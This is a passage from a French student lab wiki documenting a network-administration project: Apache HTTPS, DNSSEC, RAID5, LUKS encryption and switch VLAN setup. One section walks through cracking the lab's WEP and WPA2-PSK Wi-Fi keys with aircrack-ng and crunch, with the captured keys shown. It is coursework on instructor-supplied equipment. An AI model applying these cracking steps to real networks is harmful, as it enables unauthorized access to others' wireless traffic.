      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `/etc/fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef ====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Bridge Cordouan ===&lt;br /&gt;
&lt;br /&gt;
Nous avons due modifier le bridge de cordouan afin de relier les 2 ports ethernets ensemble&lt;br /&gt;
&lt;br /&gt;
nano /ect/network/interfaces&lt;br /&gt;
    &lt;br /&gt;
    # Bridge for IMA2a5&lt;br /&gt;
    &lt;br /&gt;
    auto eth1 &lt;br /&gt;
    auto eth4&lt;br /&gt;
    iface eth1 inet manual&lt;br /&gt;
        post-up ifconfig $IFACE up&lt;br /&gt;
        post-down ifconfig $IFACE down&lt;br /&gt;
    iface eth4 inet manual&lt;br /&gt;
        post-up ifconfig $IFACE up&lt;br /&gt;
        post-down ifconfig $IFACE down&lt;br /&gt;
      &lt;br /&gt;
    auto IMA2a5&lt;br /&gt;
    iface IMA2a5 inet manual&lt;br /&gt;
      bridge_ports eth1 eth4&lt;br /&gt;
&lt;br /&gt;
Puis on réveille les ports à l'aide de Ifdown et Ifup&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre routeur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
